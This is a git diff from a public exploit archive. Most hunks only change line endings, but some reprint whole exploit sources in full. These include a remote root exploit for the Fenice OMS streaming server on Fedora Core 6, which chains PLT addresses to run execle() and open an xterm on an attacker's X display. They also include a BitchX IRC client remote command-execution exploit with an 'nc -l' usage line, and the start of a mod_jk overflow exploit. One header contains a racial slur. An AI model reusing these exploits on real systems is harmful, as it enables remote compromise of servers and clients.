__GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NULL_STR); - i+=1; /* null */ - } - // argv[3]: xhost_ip:0 - for(ip=0;ip<10;ip++){ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - - switch(xhost_ip[ip]){ - case '0': - __GOGOSSING(do_ex,j,NUM_0); - break; - case '1': - __GOGOSSING(do_ex,j,NUM_1); - break; - case '2': - __GOGOSSING(do_ex,j,NUM_2); - break; - case '3': - __GOGOSSING(do_ex,j,NUM_3); - break; - case '4': - __GOGOSSING(do_ex,j,NUM_4); - break; - case '5': - __GOGOSSING(do_ex,j,NUM_5); - break; - case '6': - __GOGOSSING(do_ex,j,NUM_6); - break; - case '7': - __GOGOSSING(do_ex,j,NUM_7); - break; - case '8': - __GOGOSSING(do_ex,j,NUM_8); - break; - case '9': - __GOGOSSING(do_ex,j,NUM_9); - break; - } - i+=1; - } - { - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,COLON_STR); - i+=1; /* ":" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NUM_0); - i+=1; /* "0" */ - __GOGOSSING(do_ex,j,STRCPY_PLT); - __GOGOSSING(do_ex,j,MOVE_ESP); - __GOGOSSING(do_ex,j,DATA_LOC+i); - __GOGOSSING(do_ex,j,NULL_STR); - i+=1; /* null */ - } - // exploit - { - __GOGOSSING(do_ex,j,GETGID_PLT); // getgidÀÇ GOT´Â execle() ÇÔ¼ö¸¦ °¡Áö¹Ç·Î, PLT·Î Çڵ鸵 °¡´É. - __GOGOSSING(do_ex,j,0x82828282); // callÀÌ ¾Æ´Ï¹Ç·Î, ÀÌÀü ÇÔ¼ö %eip¸¦ ´ë½ÅÇØ¼­ ä¿ò. 
- __GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */ - __GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */ - __GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */ - __GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */ - } - printf("** exploit size: %d\n",strlen(do_ex)); - - i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr)); - if(i==-1){ - printf("** connect() error\n**\n*/\n"); - return -1; - } - else { - printf("** send exploit\n"); - send(sock,do_ex,j,0); - - printf("** sleepppppppp...\n"); - sleep(1); - send(sock,"\n",1,0); - send(sock,"\n",1,0); - } - close(sock); - - printf("** xhost, check it up, now!\n**\n*/\n"); - exit(0); -} - -/* eoc */ - -// milw0rm.com [2007-04-29] +/* +** +** Fedora Core 6 (exec-shield) based +** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit +** by Xpl017Elz +** +** Advanced exploitation in exec-shield (Fedora Core case study) +** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt +** +** Reference: http://www.securityfocus.com/bid/17678 +** vendor: http://streaming.polito.it/legacy_server +** +** -- +** exploit by "you dong-hun"(Xpl017Elz), . +** My World: http://x82.inetcop.org +** +*/ +/* +** -=-= POINT! POINT! POINT! POINT! POINT! =-=- +** +** This is a very common standalone daemon remote buffer overflow vulnerability. +** I used the method that I used on my proftpd exploit again to avoid random mapping library. +** And I'm plainning to publish it in English. +** +** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt +** +** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more. 
+** +*/ + +#include +#include +#include +#include +#include +#include + + +#define UNAME_PLT 0x8048e9c // // randomÇϰÔ mappingµÇ´Â (execle()>>16)&0xff GOT 1byte¸¦ È®º¸Çϱâ À§ÇØ + +#define STRCPY_PLT 0x08048ffc // +#define MOVE_ESP 0x80569e5 // <__do_global_ctors_aux+37>: pop %ebx // retÀ» Æ÷ÇÔ ÃÑ 12byte À̵¿ (nergal's idea) + +#define GETGID_GOT 0x8059234 // execle() ÇÔ¼ö ÁÖ¼Ò¸¦ ÀÓÀÇ·Î Á¶ÇÕÇÏ¿© ³ÖÀ» GOT ÁÖ¼Ò +/* + (gdb) x/x 0x8059234 + 0x8059234 <_GLOBAL_OFFSET_TABLE_+324>: 0x08049222 + (gdb) x 0x08049222 + 0x8049222 : 0x00027068 + (gdb) +*/ +#define GETGID_PLT 0x0804921c // // GOT Á¶ÇÕ ÀÌÈÄ, PLT¸¦ ÅëÇØ execle() ÇÔ¼ö Çڵ鸵 + + +#define EXECLE_16_0xff 0x8059156 // (execle()>>16)&0xff // uname ÇÔ¼öÀÇ 1byte: 0x!!0000 +#define EXECLE_08_0xff 0x80591b5 // (execle()>>8)&0xff // bind ÇÔ¼öÀÇ 1byte: 0x00!!00 +#define EXECLE_00_0xff 0x8048e83 // (execle()>>0)&0xff // ³ª¸ÓÁö Á¤ÀûÀÎ 1byte: 0x0000!! + + +/* Á¤ÀûÀ¸·Î Á¢±Ù °¡´ÉÇÑ ¹öÆÛ°¡ ÀÖÀ» °æ¿ì, ÇÊ¿ä ¾øÀ½ */ +#define DATA_LOC 0x805af4c // heap ºó °ø°£À» ÀÌ¿ë + + +/* /usr/X11R6/bin/xterm */ +#define ARG1_LOC 0x805af4c // Á¶ÇÕµÈ ¸í·É ½ÃÀÛ ÁÖ¼Ò (argv[0],argv[1]·Î ¾²ÀÓ) +#define SLASH_STR 0x8055acb // "/" +#define XTERM_STR_1 0x804875d // "us" +#define XTERM_STR_2 0x80585ce // "r/" +#define X_STR_1 0x8048df3 // "X" +#define R_STR 0x804a572 // "R" +#define XTERM_STR_3 0x804882c // "bin" +#define X_STR_2 0x8048e33 // "x" +#define XTERM_STR_4 0x8056a33 // "term" + + +/* -display */ +#define ARG2_LOC 0x805af61 // Á¶ÇÕµÈ ¿É¼Ç ½ÃÀÛ ÁÖ¼Ò (argv[2]·Î ¾²ÀÓ) +#define DISPLAY_OPTION 0x80584b8 // "-di" + + +/* xhost_ip:0 */ +#define ARG3_LOC 0x805af65 // Á¶ÇÕµÈ xhost IP ½ÃÀÛ ÁÖ¼Ò (argv[3]À¸·Î ¾²ÀÓ) +#define NUM_0 0x8053285 // "0" +#define NUM_1 0x804ef17 // "1" +#define NUM_2 0x804b37b // "2" +#define NUM_3 0x804d622 // "3" +#define NUM_4 0x804e583 // "4" +#define NUM_5 0x80554d7 // "5" +#define NUM_6 0x8052341 // "6" +#define NUM_7 0x804d14a // "7" +#define NUM_8 0x8048db3 // "8" +#define NUM_9 0x80516bb // "9" + + +#define COLON_STR 0x8057abb // 
":" +#define NULL_STR 0x805afbe // 0x00000000 + + +int main(int argc,char *argv[]){ + int i=0,j=0; + struct hostent *se; + struct sockaddr_in saddr; + unsigned long ip,ip1,ip2,ip3,ip4; + unsigned char do_ex[4096]; + unsigned char xhost_ip[256]; + int sock; + char host[256]; + int port=554; + + memset((char *)do_ex,0,sizeof(do_ex)); + ip=ip1=ip2=ip3=ip4; + + + printf("/*\n**\n** Fedora Core 6 (exec-shield) based\n" + "** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit\n" + "** by Xpl017Elz\n**\n"); + if(argc<2){ + printf("** Usage: %s [host] [port] [xhost ip]\n",argv[0]); + printf("**\n** host: Fenice 1.10 Open Media Streaming Server\n"); + printf("** port: default 554\n"); + printf("** xhost ip: attacker xhost\n**\n"); + printf("** Example: %s fenice.omss.co.kr 554 82.82.82.82\n**\n*/\n",argv[0]); + exit(-1); + } + else { + sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); +#define IP1 16777216 +#define IP2 65536 +#define IP3 256 + ip=0; + ip+=ip1 * (IP1); + ip+=ip2 * (IP2); + ip+=ip3 * (IP3); + ip+=ip4; + + memset((char *)xhost_ip,0,256); + sprintf(xhost_ip,"%10lu",ip); + } + + memset((char *)host,0,sizeof(host)); + strncpy(host,argv[1],sizeof(host)-1); + port=atoi(argv[2]); + + se=gethostbyname(host); + if(se==NULL){ + printf("** gethostbyname() error\n**\n*/\n"); + return -1; + } + sock=socket(AF_INET,SOCK_STREAM,0); + if(sock==-1){ + printf("** socket() error\n**\n*/\n"); + return -1; + } + + saddr.sin_family=AF_INET; + saddr.sin_port=htons(port); + saddr.sin_addr=*((struct in_addr *)se->h_addr); + bzero(&(saddr.sin_zero),8); + + + printf("** make exploit\n"); + sprintf(do_ex,"GET /"); + j=strlen(do_ex); + for(i=0;i<320;i++,j++){ + sprintf(do_ex+j,"A"); + } + +#define __GOGOSSING(dest,index,src){\ + *(long *)&dest[index]=src;\ + index+=4;\ +} + + __GOGOSSING(do_ex,j,UNAME_PLT); /* uname GOT °ª ä¿ò */ + // execle() ÁÖ¼Ò Á¶ÇÕ + { + i=0; + /* (execle()>>0)&0xff */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + 
__GOGOSSING(do_ex,j,GETGID_GOT+i++); + __GOGOSSING(do_ex,j,EXECLE_00_0xff); + /* (execle()>>8)&0xff */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,GETGID_GOT+i++); + __GOGOSSING(do_ex,j,EXECLE_08_0xff); + /* (execle()>>16)&0xff */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,GETGID_GOT+i++); + __GOGOSSING(do_ex,j,EXECLE_16_0xff); + } + // argv[0],argv[1]: /usr/X11R6/bin/xterm + { + i=0; + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,SLASH_STR); + i+=1; /* "/" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,XTERM_STR_1); + i+=2; /* "us" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,XTERM_STR_2); + i+=2; /* "r/" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,X_STR_1); + i+=1; /* "X" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NUM_1); + i+=1; /* "1" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NUM_1); + i+=1; /* "1" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,R_STR); + i+=1; /* "R" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NUM_6); + i+=1; /* "6" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,SLASH_STR); + i+=1; /* "/" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + 
__GOGOSSING(do_ex,j,XTERM_STR_3); + i+=3; /* "bin" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,SLASH_STR); + i+=1; /* "/" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,X_STR_2); + i+=1; /* "x" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,XTERM_STR_4); + i+=4; /* "term" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NULL_STR); + i+=1; /* null */ + } + // argv[2]: -display + { + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,DISPLAY_OPTION); + i+=3; /* "-di" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NULL_STR); + i+=1; /* null */ + } + // argv[3]: xhost_ip:0 + for(ip=0;ip<10;ip++){ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + + switch(xhost_ip[ip]){ + case '0': + __GOGOSSING(do_ex,j,NUM_0); + break; + case '1': + __GOGOSSING(do_ex,j,NUM_1); + break; + case '2': + __GOGOSSING(do_ex,j,NUM_2); + break; + case '3': + __GOGOSSING(do_ex,j,NUM_3); + break; + case '4': + __GOGOSSING(do_ex,j,NUM_4); + break; + case '5': + __GOGOSSING(do_ex,j,NUM_5); + break; + case '6': + __GOGOSSING(do_ex,j,NUM_6); + break; + case '7': + __GOGOSSING(do_ex,j,NUM_7); + break; + case '8': + __GOGOSSING(do_ex,j,NUM_8); + break; + case '9': + __GOGOSSING(do_ex,j,NUM_9); + break; + } + i+=1; + } + { + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,COLON_STR); + i+=1; /* ":" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + 
__GOGOSSING(do_ex,j,NUM_0); + i+=1; /* "0" */ + __GOGOSSING(do_ex,j,STRCPY_PLT); + __GOGOSSING(do_ex,j,MOVE_ESP); + __GOGOSSING(do_ex,j,DATA_LOC+i); + __GOGOSSING(do_ex,j,NULL_STR); + i+=1; /* null */ + } + // exploit + { + __GOGOSSING(do_ex,j,GETGID_PLT); // getgidÀÇ GOT´Â execle() ÇÔ¼ö¸¦ °¡Áö¹Ç·Î, PLT·Î Çڵ鸵 °¡´É. + __GOGOSSING(do_ex,j,0x82828282); // callÀÌ ¾Æ´Ï¹Ç·Î, ÀÌÀü ÇÔ¼ö %eip¸¦ ´ë½ÅÇØ¼­ ä¿ò. + __GOGOSSING(do_ex,j,ARG1_LOC); /* argv[0] */ + __GOGOSSING(do_ex,j,ARG1_LOC); /* argv[1] */ + __GOGOSSING(do_ex,j,ARG2_LOC); /* argv[2] */ + __GOGOSSING(do_ex,j,ARG3_LOC); /* argv[3] */ + } + printf("** exploit size: %d\n",strlen(do_ex)); + + i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr)); + if(i==-1){ + printf("** connect() error\n**\n*/\n"); + return -1; + } + else { + printf("** send exploit\n"); + send(sock,do_ex,j,0); + + printf("** sleepppppppp...\n"); + sleep(1); + send(sock,"\n",1,0); + send(sock,"\n",1,0); + } + close(sock); + + printf("** xhost, check it up, now!\n**\n*/\n"); + exit(0); +} + +/* eoc */ + +// milw0rm.com [2007-04-29] diff --git a/platforms/linux/remote/382.c b/platforms/linux/remote/382.c index 177957f39..a12549520 100755 --- a/platforms/linux/remote/382.c +++ b/platforms/linux/remote/382.c @@ -87,6 +87,6 @@ NICKNAME\n",host,port,jump,sizeof(nick)-6); } else printf("Can't connect to %s at %d\n",host,port),exit(1); } -} - -// milw0rm.com [2002-12-24] +} + +// milw0rm.com [2002-12-24] diff --git a/platforms/linux/remote/386.c b/platforms/linux/remote/386.c index 0c5d86b12..b58660059 100755 --- a/platforms/linux/remote/386.c +++ b/platforms/linux/remote/386.c @@ -497,6 +497,6 @@ jumpout: banner(); example(exploit); return EXIT_FAILURE; -} - -// milw0rm.com [2004-08-09] +} + +// milw0rm.com [2004-08-09] diff --git a/platforms/linux/remote/387.c b/platforms/linux/remote/387.c index 8b20433ff..595c7cff8 100755 --- a/platforms/linux/remote/387.c +++ b/platforms/linux/remote/387.c 
@@ -239,6 +239,6 @@ usage(const char *progname) { fprintf(stderr, "coded by livenn"); fprintf(stderr, "Usage: %s [-l ] [-r ]" " [-v ] n", progname); -} - -// milw0rm.com [2004-08-09] +} + +// milw0rm.com [2004-08-09] diff --git a/platforms/linux/remote/389.c b/platforms/linux/remote/389.c index d28226216..1c0c6250c 100755 --- a/platforms/linux/remote/389.c +++ b/platforms/linux/remote/389.c @@ -151,6 +151,6 @@ int main(int argc, char **argv) close(fd); return 0; -} - -// milw0rm.com [2004-08-11] +} + +// milw0rm.com [2004-08-11] diff --git a/platforms/linux/remote/39.c b/platforms/linux/remote/39.c index d36e69663..dd327ad16 100755 --- a/platforms/linux/remote/39.c +++ b/platforms/linux/remote/39.c @@ -322,6 +322,6 @@ int main(int argc, char *argv[]) return 1 ; } - - -// milw0rm.com [2003-06-10] + + +// milw0rm.com [2003-06-10] diff --git a/platforms/linux/remote/390.c b/platforms/linux/remote/390.c index d4817a32f..53634cba1 100755 --- a/platforms/linux/remote/390.c +++ b/platforms/linux/remote/390.c @@ -78,6 +78,6 @@ int main(int argc, char **argv) close(fd); return 0; -} - -// milw0rm.com [2004-08-13] +} + +// milw0rm.com [2004-08-13] diff --git a/platforms/linux/remote/397.c b/platforms/linux/remote/397.c index c2d6f33be..8d231feba 100755 --- a/platforms/linux/remote/397.c +++ b/platforms/linux/remote/397.c @@ -149,6 +149,6 @@ int main(int argc, char *argv[]) return; } - - -// milw0rm.com [2002-06-25] + + +// milw0rm.com [2002-06-25] diff --git a/platforms/linux/remote/398.c b/platforms/linux/remote/398.c index 787b9f4bb..7adedbf89 100755 --- a/platforms/linux/remote/398.c +++ b/platforms/linux/remote/398.c @@ -356,6 +356,6 @@ handleshell(int closeme, int s) fprintf(stderr, "%s", in); } } -} - -// milw0rm.com [2002-01-01] +} + +// milw0rm.com [2002-01-01] diff --git a/platforms/linux/remote/399.c b/platforms/linux/remote/399.c index 9e57ce07a..62c5f290c 100755 --- a/platforms/linux/remote/399.c +++ b/platforms/linux/remote/399.c 
@@ -432,6 +432,6 @@ handleshell(int closeme, int s) fprintf(stderr, "%s", in); } } -} - -// milw0rm.com [2002-01-01] +} + +// milw0rm.com [2002-01-01] diff --git a/platforms/linux/remote/405.c b/platforms/linux/remote/405.c index 0d46db483..dff8165c7 100755 --- a/platforms/linux/remote/405.c +++ b/platforms/linux/remote/405.c @@ -146,6 +146,6 @@ int main(int argc, char **argv) return 0; -} - -// milw0rm.com [2004-08-20] +} + +// milw0rm.com [2004-08-20] diff --git a/platforms/linux/remote/408.c b/platforms/linux/remote/408.c index 744b4883a..3e7e4e0fa 100755 --- a/platforms/linux/remote/408.c +++ b/platforms/linux/remote/408.c @@ -168,6 +168,6 @@ int main(int argc, char **argv) make_bmp(buf, len); return 0; } - - -// milw0rm.com [2004-08-21] + + +// milw0rm.com [2004-08-21] diff --git a/platforms/linux/remote/4087.c b/platforms/linux/remote/4087.c index 7ae8c1b85..448dd7cd3 100755 --- a/platforms/linux/remote/4087.c +++ b/platforms/linux/remote/4087.c 
@@ -1,158 +1,158 @@ -/* Name: PBXS - Pointless BitchX Sploit - * Author: clarity_ - * Infected Versions: 1.1-final and others? - * Synopsis: BitchX suffers from a unchecked bounds in a hash table in hook.c where one - * can inject data structures allowing for the remote execution of commands! - * Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx - * version connects to the mischievous server "ps -aux" will be executed. - * Shout Outs: solomon, crypt1, vortek, ziri, and all the other niggaz at svun @ undernet - */ - -// Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org -#define HOOK_FUNCTIONS 0x81366e0 -#define NICKNAME 0x8155353 -#define STAR 0x8108f34 - -#include -#include -#include - -#define NICK_STR ":bleh!i" -#define NICK_STR2 "@svun.powns.net NICK :" -#define EXEC_STR "EXEC $1-" -#define RAW_FMT_STR ":my_server -%u bleh :%s" - -typedef struct { - unsigned int hook_functions, - nickname, - star; - unsigned int base, diff, offset; -} Addresses; - -/* Partial structs full struct w/ correct values found in include/struct.h */ -// To be loaded into nickname static -typedef struct { - unsigned int name; // point to hook - unsigned int list; - // EXEC $1- 2 words -} HookFunc; - -// To be loaded into joined_nick static -typedef struct { -// unsigned int next; /* struct hook_stru *next; */ - unsigned int nick; /* char *nick; */ //star - unsigned int stuff; /* char *stuff; */ - unsigned int shit; -} Hook; - -char * make_nickname(Addresses *addrs, int X, int Y) { - char *tmp = NULL, *sp = NULL; - int i; - HookFunc h; - Hook hk; - - // malloc - tmp = (char *) malloc(1024); - - // BASE - h.name = addrs->star; - h.list = addrs->base - addrs->diff - 4; - - if (Y) { - // start loading string - if (X == 4) { - strcpy(tmp, NICK_STR); - } - else { - strcpy(tmp, ":"); - strcat(tmp, make_nickname(addrs, X + 1, 0)); - strcat(tmp, "!i"); - } - - sp = tmp + strlen(tmp); // point to char after tmp - //*sp++ = '0' + X; - 
strcpy(sp, NICK_STR2); - } - else { - sp = tmp; - *tmp = '\0'; - } - - hk.nick = addrs->star; - hk.stuff = addrs->base + 8; // "stuff" is loaded after the nick - - // load str - sp = tmp + strlen(tmp); // point to char after tmp - - memcpy(sp, &hk, sizeof(Hook)); - sp += sizeof(Hook) - 4; - - if (X != 4) { - while (X--) { - *sp++ = 'X'; - } - *sp++ = '\0'; - return tmp; - } - else { - while (X--) { - *sp++ = 'X'; - } - } - - - // pad - if (sizeof(Hook) > addrs->diff) { - printf("!!!!!!!!!!!!!ERRRRRRRRRRRRROOOOOOOOOOOOOOOOORRRRRRRRRRRRRRRRRR: %d\n", addrs->diff); - } - - for (i = sizeof(Hook); i < addrs->diff; ++i) - *sp++ = 'x'; - - memcpy(sp, &h, sizeof(HookFunc)); - sp += sizeof(HookFunc); - memcpy(sp, EXEC_STR, strlen(EXEC_STR)); - --sp[4]; - sp += strlen(EXEC_STR); - *++sp = '\0'; - - return tmp; -} - -//#define RAW_FMT_STR ":my_server %d bleh :%s" -char * make_raw(Addresses *addrs, char *cmd) { - char *tmp = NULL; - unsigned int len; - - len = 2000; // fix later - tmp = (char *) malloc(len); - - sprintf(tmp, RAW_FMT_STR, addrs->offset, cmd); - - return tmp; -} - -int main(int argc, char **argv) { - Addresses addrs; - char *cmd = argv[1]; - - addrs.hook_functions = HOOK_FUNCTIONS; - addrs.nickname = NICKNAME; - addrs.star = STAR; - - addrs.offset = ((NICKNAME - HOOK_FUNCTIONS) / 20) + 1; - addrs.diff = 20 - ((NICKNAME - HOOK_FUNCTIONS) % 20); - addrs.base = NICKNAME + addrs.diff; - - printf(":my_server 001 bleh :a\n"); - printf("%s\n", make_nickname(&addrs, 4, 1)); - printf("%s\n", make_nickname(&addrs, 3, 1)); - printf("%s\n", make_nickname(&addrs, 2, 1)); - printf("%s\n", make_nickname(&addrs, 1, 1)); - printf("%s\n", make_nickname(&addrs, 0, 1)); - printf("%s\n", make_raw(&addrs, cmd)); - - return 0; -} - -// milw0rm.com [2007-06-21] +/* Name: PBXS - Pointless BitchX Sploit + * Author: clarity_ + * Infected Versions: 1.1-final and others? 
+ * Synopsis: BitchX suffers from a unchecked bounds in a hash table in hook.c where one + * can inject data structures allowing for the remote execution of commands! + * Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx + * version connects to the mischievous server "ps -aux" will be executed. + * Shout Outs: solomon, crypt1, vortek, ziri, and all the other niggaz at svun @ undernet + */ + +// Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org +#define HOOK_FUNCTIONS 0x81366e0 +#define NICKNAME 0x8155353 +#define STAR 0x8108f34 + +#include +#include +#include + +#define NICK_STR ":bleh!i" +#define NICK_STR2 "@svun.powns.net NICK :" +#define EXEC_STR "EXEC $1-" +#define RAW_FMT_STR ":my_server -%u bleh :%s" + +typedef struct { + unsigned int hook_functions, + nickname, + star; + unsigned int base, diff, offset; +} Addresses; + +/* Partial structs full struct w/ correct values found in include/struct.h */ +// To be loaded into nickname static +typedef struct { + unsigned int name; // point to hook + unsigned int list; + // EXEC $1- 2 words +} HookFunc; + +// To be loaded into joined_nick static +typedef struct { +// unsigned int next; /* struct hook_stru *next; */ + unsigned int nick; /* char *nick; */ //star + unsigned int stuff; /* char *stuff; */ + unsigned int shit; +} Hook; + +char * make_nickname(Addresses *addrs, int X, int Y) { + char *tmp = NULL, *sp = NULL; + int i; + HookFunc h; + Hook hk; + + // malloc + tmp = (char *) malloc(1024); + + // BASE + h.name = addrs->star; + h.list = addrs->base - addrs->diff - 4; + + if (Y) { + // start loading string + if (X == 4) { + strcpy(tmp, NICK_STR); + } + else { + strcpy(tmp, ":"); + strcat(tmp, make_nickname(addrs, X + 1, 0)); + strcat(tmp, "!i"); + } + + sp = tmp + strlen(tmp); // point to char after tmp + //*sp++ = '0' + X; + strcpy(sp, NICK_STR2); + } + else { + sp = tmp; + *tmp = '\0'; + } + + hk.nick = addrs->star; + hk.stuff = addrs->base + 8; // 
"stuff" is loaded after the nick + + // load str + sp = tmp + strlen(tmp); // point to char after tmp + + memcpy(sp, &hk, sizeof(Hook)); + sp += sizeof(Hook) - 4; + + if (X != 4) { + while (X--) { + *sp++ = 'X'; + } + *sp++ = '\0'; + return tmp; + } + else { + while (X--) { + *sp++ = 'X'; + } + } + + + // pad + if (sizeof(Hook) > addrs->diff) { + printf("!!!!!!!!!!!!!ERRRRRRRRRRRRROOOOOOOOOOOOOOOOORRRRRRRRRRRRRRRRRR: %d\n", addrs->diff); + } + + for (i = sizeof(Hook); i < addrs->diff; ++i) + *sp++ = 'x'; + + memcpy(sp, &h, sizeof(HookFunc)); + sp += sizeof(HookFunc); + memcpy(sp, EXEC_STR, strlen(EXEC_STR)); + --sp[4]; + sp += strlen(EXEC_STR); + *++sp = '\0'; + + return tmp; +} + +//#define RAW_FMT_STR ":my_server %d bleh :%s" +char * make_raw(Addresses *addrs, char *cmd) { + char *tmp = NULL; + unsigned int len; + + len = 2000; // fix later + tmp = (char *) malloc(len); + + sprintf(tmp, RAW_FMT_STR, addrs->offset, cmd); + + return tmp; +} + +int main(int argc, char **argv) { + Addresses addrs; + char *cmd = argv[1]; + + addrs.hook_functions = HOOK_FUNCTIONS; + addrs.nickname = NICKNAME; + addrs.star = STAR; + + addrs.offset = ((NICKNAME - HOOK_FUNCTIONS) / 20) + 1; + addrs.diff = 20 - ((NICKNAME - HOOK_FUNCTIONS) % 20); + addrs.base = NICKNAME + addrs.diff; + + printf(":my_server 001 bleh :a\n"); + printf("%s\n", make_nickname(&addrs, 4, 1)); + printf("%s\n", make_nickname(&addrs, 3, 1)); + printf("%s\n", make_nickname(&addrs, 2, 1)); + printf("%s\n", make_nickname(&addrs, 1, 1)); + printf("%s\n", make_nickname(&addrs, 0, 1)); + printf("%s\n", make_raw(&addrs, cmd)); + + return 0; +} + +// milw0rm.com [2007-06-21] diff --git a/platforms/linux/remote/416.c b/platforms/linux/remote/416.c index 48e291a4d..997c9b8a9 100755 --- a/platforms/linux/remote/416.c +++ b/platforms/linux/remote/416.c @@ -123,6 +123,6 @@ target.cnt--; } while(target.cnt > 0); close(sock); return 0; -} - -// milw0rm.com [2004-08-25] +} + +// milw0rm.com [2004-08-25] 
diff --git a/platforms/linux/remote/4162.c b/platforms/linux/remote/4162.c
index c32334288..f47cbafae 100755
--- a/platforms/linux/remote/4162.c
+++ b/platforms/linux/remote/4162.c
@@ -1,411 +1,411 @@ -/* -** -** Fedora Core 5,6 (exec-shield) based -** Apache Tomcat Connector (mod_jk) remote overflow exploit -** by Xpl017Elz -** -** Advanced exploitation in exec-shield (Fedora Core case study) -** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt -** -** Reference: http://www.securityfocus.com/bid/22791 -** vendor: http://tomcat.apache.org/ -** -** eliteboy's exploit (SUSE, Debian, FreeBSD): -** http://www.milw0rm.com/exploits/4093 -** -** Nicob 's exploit (Win32): -** http://downloads.securityfocus.com/vulnerabilities/exploits/apache_modjk_overflow.rb -** -** -- -** exploit by "you dong-hun"(Xpl017Elz), . -** My World: http://x82.inetcop.org -** -*/ - -#include -#include -#include -#include -#include -#include -#include -#ifdef __linux__ -#include -#endif - -#define MAP_URI_TO_WORKER_1_FC5 0x080474bc /* (0x2040),(0x201c) */ -#define 